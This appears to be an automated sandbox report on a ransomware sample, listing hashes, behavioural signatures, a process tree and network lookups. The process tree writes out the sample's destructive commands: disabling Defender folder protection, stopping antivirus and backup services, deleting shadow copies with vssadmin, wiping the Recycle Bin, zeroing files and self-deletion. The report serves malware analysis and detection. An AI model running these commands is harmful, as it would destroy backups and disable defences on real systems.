Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231130-en
  • resource tags

    arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system
  • submitted
    14/12/2023, 11:54 UTC

General

  • Target

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

  • Size

    91KB

  • MD5

    be60e389a0108b2871dff12dfbb542ac

  • SHA1

    14b4e0bfac64ec0f837f84ab1780ca7ced8d670d

  • SHA256

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d

  • SHA512

    6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641

  • SSDEEP

    1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (85) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Enumerates connected drives 3 TTPs 6 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
    "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2392
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1212
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      2⤵
        PID:2748
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          3⤵
            PID:2804
        • C:\Windows\SysWOW64\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:2968
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              3⤵
                PID:1732
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop mfewc /y
              2⤵
                PID:3012
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop mfewc /y
                  3⤵
                    PID:2152
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop DefWatch /y
                  2⤵
                    PID:2564
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop DefWatch /y
                      3⤵
                        PID:2068
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop ccSetMgr /y
                      2⤵
                        PID:2676
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop ccSetMgr /y
                          3⤵
                            PID:1292
                        • C:\Windows\SysWOW64\net.exe
                          "net.exe" stop SavRoam /y
                          2⤵
                            PID:2660
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SavRoam /y
                              3⤵
                                PID:2064
                            • C:\Windows\SysWOW64\net.exe
                              "net.exe" stop ccEvtMgr /y
                              2⤵
                                PID:2616
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop ccEvtMgr /y
                                  3⤵
                                    PID:2228
                                • C:\Windows\SysWOW64\net.exe
                                  "net.exe" stop RTVscan /y
                                  2⤵
                                    PID:2252
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop RTVscan /y
                                      3⤵
                                        PID:2944
                                    • C:\Windows\SysWOW64\net.exe
                                      "net.exe" stop Intuit.QuickBooks.FCS /y
                                      2⤵
                                        PID:2840
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                          3⤵
                                            PID:2632
                                        • C:\Windows\SysWOW64\net.exe
                                          "net.exe" stop QBIDPService /y
                                          2⤵
                                            PID:2496
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop QBIDPService /y
                                              3⤵
                                                PID:3016
                                            • C:\Windows\SysWOW64\net.exe
                                              "net.exe" stop QBCFMonitorService /y
                                              2⤵
                                                PID:2624
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                  3⤵
                                                    PID:1632
                                                • C:\Windows\SysWOW64\net.exe
                                                  "net.exe" stop QBFCService /y
                                                  2⤵
                                                    PID:2620
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 stop QBFCService /y
                                                      3⤵
                                                        PID:2504
                                                    • C:\Windows\SysWOW64\net.exe
                                                      "net.exe" stop NetBackup BMR MTFTP Service /y
                                                      2⤵
                                                        PID:1340
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                                                          3⤵
                                                            PID:1464
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop BMR Boot Service /y
                                                          2⤵
                                                            PID:2132
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop BMR Boot Service /y
                                                              3⤵
                                                                PID:2948
                                                            • C:\Windows\SysWOW64\net.exe
                                                              "net.exe" stop YooBackup /y
                                                              2⤵
                                                                PID:2008
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 stop YooBackup /y
                                                                  3⤵
                                                                    PID:2316
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  "net.exe" stop stc_raw_agent /y
                                                                  2⤵
                                                                    PID:852
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                      3⤵
                                                                        PID:2288
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      "net.exe" stop VSNAPVSS /y
                                                                      2⤵
                                                                        PID:1524
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                          3⤵
                                                                            PID:1076
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          "net.exe" stop veeam /y
                                                                          2⤵
                                                                            PID:1940
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop veeam /y
                                                                              3⤵
                                                                                PID:2056
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              "net.exe" stop PDVFSService /y
                                                                              2⤵
                                                                                PID:2688
                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                  C:\Windows\system32\net1 stop PDVFSService /y
                                                                                  3⤵
                                                                                    PID:1900
                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                  "net.exe" stop VeeamNFSSvc /y
                                                                                  2⤵
                                                                                    PID:2520
                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                      C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                      3⤵
                                                                                        PID:1172
                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                      "net.exe" stop VeeamDeploymentService /y
                                                                                      2⤵
                                                                                        PID:848
                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                          C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                          3⤵
                                                                                            PID:1704
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          "net.exe" stop VeeamTransportSvc /y
                                                                                          2⤵
                                                                                            PID:1892
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                              3⤵
                                                                                                PID:2320
                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                              "net.exe" stop zhudongfangyu /y
                                                                                              2⤵
                                                                                                PID:2528
                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                  C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                                                  3⤵
                                                                                                    PID:2304
                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                  "net.exe" stop YooIT /y
                                                                                                  2⤵
                                                                                                    PID:1044
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 stop YooIT /y
                                                                                                      3⤵
                                                                                                        PID:2160
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      "net.exe" stop BackupExecVSSProvider /y
                                                                                                      2⤵
                                                                                                        PID:2780
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                          3⤵
                                                                                                            PID:488
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                          2⤵
                                                                                                            PID:596
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                              3⤵
                                                                                                                PID:1164
                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                              "net.exe" stop BackupExecRPCService /y
                                                                                                              2⤵
                                                                                                                PID:1472
                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                  3⤵
                                                                                                                    PID:1320
                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                  "net.exe" stop BackupExecManagementService /y
                                                                                                                  2⤵
                                                                                                                    PID:652
                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                    "net.exe" stop BackupExecJobEngine /y
                                                                                                                    2⤵
                                                                                                                      PID:1456
                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                      "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                      2⤵
                                                                                                                        PID:1240
                                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                                        "net.exe" stop BackupExecAgentBrowser /y
                                                                                                                        2⤵
                                                                                                                          PID:588
                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                          "net.exe" stop AcrSch2Svc /y
                                                                                                                          2⤵
                                                                                                                            PID:860
                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                              3⤵
                                                                                                                                PID:2300
                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                              "net.exe" stop AcronisAgent /y
                                                                                                                              2⤵
                                                                                                                                PID:824
                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                  3⤵
                                                                                                                                    PID:344
                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                  "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                  2⤵
                                                                                                                                    PID:692
                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                      3⤵
                                                                                                                                        PID:1656
                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                      "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                      2⤵
                                                                                                                                        PID:1564
                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                          3⤵
                                                                                                                                            PID:1440
                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                          "net.exe" stop sophos /y
                                                                                                                                          2⤵
                                                                                                                                            PID:1832
                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop sophos /y
                                                                                                                                              3⤵
                                                                                                                                                PID:1572
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                              2⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:788
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                              2⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:644
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              "sc.exe" config SstpSvc start= disabled
                                                                                                                                              2⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:1224
                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                              "sc.exe" config SQLWriter start= disabled
                                                                                                                                              2⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:2164
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              "taskkill.exe" /IM mspub.exe /F
                                                                                                                                              2⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1244
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                              2⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2888
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                              2⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2108
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2336
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2140
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:712
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1176
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:912
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1904
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2060
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2908
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2376
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1584
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2420
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2352
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2764
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1952
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                              2⤵
                                                                                                                                                PID:2568
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1A66.bat
                                                                                                                                                2⤵
                                                                                                                                                  PID:1892
                                                                                                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                                                                                                                  2⤵
                                                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                                                  PID:2800
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2532
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping 127.0.0.7 -n 3
                                                                                                                                                      3⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:1176
                                                                                                                                                    • C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                      fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1652
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Deletes itself
                                                                                                                                                      PID:2616
                                                                                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                        3⤵
                                                                                                                                                          PID:952
                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2256
                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                        C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1544
                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1036
                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                            C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2428
                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "463061751-1582314381438124199-559438155264157425-8942657485593056261063045831"
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:2660
                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2996

                                                                                                                                                            Network

                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.108.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.109.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.110.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.111.133
                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              www.google.com
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              www.google.com
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              www.google.com
                                                                                                                                                              IN A
                                                                                                                                                              142.250.200.4
                                                                                                                                                            • flag-gb
                                                                                                                                                              GET
                                                                                                                                                              https://www.google.com/
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              142.250.200.4:443
                                                                                                                                                              Request
                                                                                                                                                              GET / HTTP/1.1
                                                                                                                                                              Host: www.google.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Response
                                                                                                                                                              HTTP/1.1 200 OK
                                                                                                                                                              Date: Thu, 14 Dec 2023 11:55:04 GMT
                                                                                                                                                              Expires: -1
                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                              Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-YJg91CzRLcgSGapKGL74gQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                              Server: gws
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              Set-Cookie: SOCS=CAAaBgiAi-mrBg; expires=Sun, 12-Jan-2025 11:55:04 GMT; path=/; domain=.google.com; Secure; SameSite=lax
                                                                                                                                                              Set-Cookie: AEC=Ackid1TNdRkiV-cfseeygExHNZyXDcayNtSkGQYVNjDLOdxGjII8HmrFuKY; expires=Tue, 11-Jun-2024 11:55:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                              Set-Cookie: __Secure-ENID=16.SE=NAxD8G57McXfatvfzIY_ymPImV5SXvTsCje-AY3cp3s6yoEGv8CPDAzzxra6MLxp5fXYpvxophVJy0cJzCXugAia3Hv9-lk9V2THJOIWDUCNHkqcJoqCFQjtHNhknlk5gB0ywVY9JLm4TCxD_gPhQbI9lHvq3UfbKWS6QVV-K_w; expires=Mon, 13-Jan-2025 04:13:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                              Set-Cookie: CONSENT=PENDING+679; expires=Sat, 13-Dec-2025 11:55:04 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              pki.goog
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              pki.goog
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              pki.goog
                                                                                                                                                              IN A
                                                                                                                                                              216.239.32.29
                                                                                                                                                            • flag-us
                                                                                                                                                              GET
                                                                                                                                                              http://pki.goog/gsr1/gsr1.crt
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              216.239.32.29:80
                                                                                                                                                              Request
                                                                                                                                                              GET /gsr1/gsr1.crt HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                              Host: pki.goog
                                                                                                                                                              Response
                                                                                                                                                              HTTP/1.1 200 OK
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                                                                                                                              Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                                                                                                                              Content-Length: 889
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Server: sffe
                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                              Date: Thu, 14 Dec 2023 11:19:08 GMT
                                                                                                                                                              Expires: Thu, 14 Dec 2023 12:09:08 GMT
                                                                                                                                                              Cache-Control: public, max-age=3000
                                                                                                                                                              Age: 2155
                                                                                                                                                              Last-Modified: Wed, 20 May 2020 16:45:00 GMT
                                                                                                                                                              Content-Type: application/pkix-cert
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              www.microsoft.com
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              www.microsoft.com
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              www.microsoft.com
                                                                                                                                                              IN CNAME
                                                                                                                                                              www.microsoft.com-c-3.edgekey.net
                                                                                                                                                              www.microsoft.com-c-3.edgekey.net
                                                                                                                                                              IN CNAME
                                                                                                                                                              www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                              www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                                                                                                                                                              IN CNAME
                                                                                                                                                              e13678.dscb.akamaiedge.net
                                                                                                                                                              e13678.dscb.akamaiedge.net
                                                                                                                                                              IN A
                                                                                                                                                              173.222.13.219
                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              IN CNAME
                                                                                                                                                              poweradmin.com
                                                                                                                                                              poweradmin.com
                                                                                                                                                              IN A
                                                                                                                                                              52.1.55.52
                                                                                                                                                            • 185.199.108.133:443
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              tls
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              359 B
                                                                                                                                                              219 B
                                                                                                                                                              5
                                                                                                                                                              5
                                                                                                                                                            • 142.250.200.4:443
                                                                                                                                                              https://www.google.com/
                                                                                                                                                              tls, http
